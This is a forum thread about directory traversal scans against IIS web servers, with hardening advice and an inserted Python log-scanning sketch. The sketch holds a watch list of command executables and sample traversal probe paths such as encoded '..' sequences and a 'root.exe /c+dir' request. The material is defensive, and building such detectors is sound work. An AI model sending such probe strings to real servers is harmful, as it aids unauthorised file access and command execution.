101 traversal Xploits

Thread: 101 traversal Xploits

  1. #1
    Senior Member
    Join Date
    Apr 2002
    Posts
    324

    101 traversal Xploits

    I get scanned by people looking for directory traversal exploits all the time and I have an SQL filter set up that allows me to keep track of these suspect requests.

    The problem is that such a vulnerability scanner is very simple to make (see my tutorial on Scripting Internet Connections Under Window$ for more information). If you are worried about this sort of intrusion (and you use IIS) see my tutorial entitled Securing an installation of IIS 4. (No, seriously).

    I almost wrote a tutorial using the TCPUtil code documented in the 'Scripting connections' article to show how such a vulnerability scanner could be written, but decided against it - anyone who can't figure it out from that article...well I'm not going to draw the skiddies a picture.

    I am providing these traversal exploits here so that you can test them against _YOUR_OWN_ servers (note the IP address), and I do have a future tutorial planned on how to create your own simple IDS for web-based services (with the SQL filter I described above) when I get a minute. Watch this space.

    So - the traversals...

    "I may not agree with what you say, but I will defend to the death your right to say it."
    Sir Winston Churchill.
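
A sketch of the kind of request filter the post describes, added here as an example (it is not the author's SQL filter or the planned IDS tutorial). It flags encoded `..` traversal, malformed percent escapes and requests for command executables, and it also unwraps nested percent-encoding, which goes beyond what the post lists. The log lines are constructed, and the code assumes a W3C extended log that records the raw request path.

```python
import re
from urllib.parse import unquote

# Assumed watch list of executable names that such scans request.
SHELL_NAMES = {"cmd.exe", "cmd1.exe", "root.exe", "shell.exe", "nbtstat.exe"}
BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")  # '%' not followed by two hex digits

def classify(stem):
    """Return the reasons a raw request path looks like a traversal probe."""
    reasons = []
    if BAD_ESCAPE.search(stem):
        reasons.append("invalid-escape")
    decoded = stem
    for _ in range(3):  # unwrap nested encoding: %255c -> %5c -> backslash
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    segments = decoded.replace("\\", "/").lower().split("/")
    if ".." in segments:
        reasons.append("traversal")
    if segments[-1] in SHELL_NAMES:
        reasons.append("shell-binary")
    return reasons

def scan(log_text):
    """Parse W3C extended log text into {client_ip: [(path, reasons), ...]}."""
    fields, hits = [], {}
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names follow the directive
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            reasons = classify(row.get("cs-uri-stem", ""))
            if reasons:
                hits.setdefault(row.get("c-ip", "?"), []).append((row["cs-uri-stem"], reasons))
    return hits

# Constructed sample log: stand-in paths, documentation-range client addresses.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-05-01 10:00:01 192.0.2.10 GET /default.htm - 200
2002-05-01 10:00:02 192.0.2.66 GET /scripts/..%5c..%5cexample/file.txt - 404
2002-05-01 10:00:03 192.0.2.66 GET /scripts/..%255c../example/file.txt - 404
2002-05-01 10:00:04 192.0.2.66 GET /scripts/..%qf../example/file.txt - 400
2002-05-01 10:00:05 192.0.2.66 GET /scripts/root.exe /c+dir 404
"""

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Grouping hits by client address makes a sweep stand out: one source producing several distinct reasons in a few seconds is a scanner, not a mistyped link.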

  2. #2
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    Oh and btw - the simplest way to avoid this sort of exploit is to have all your sites hosted on a separate hard drive to your O/S.

    You can also nullify the effect of someone scanning an IP range by making your default site (W3SVC1) restricted to 127.0.0.1 so someone scanning by IP will always get 403 - unauthorised.
    "I may not agree with what you say, but I will defend to the death your right to say it."
    Sir Winston Churchill.

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Location
    Ireland
    Posts
    735
    None of these worked on my server, because each link is either OS NT or HTTP IIS. Whereas I am using RedHat with an Apache server. fl00t!

  4. #4
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    Yes - that's another good way to be secure... Pick a secure O/S...
    "I may not agree with what you say, but I will defend to the death your right to say it."
    Sir Winston Churchill.
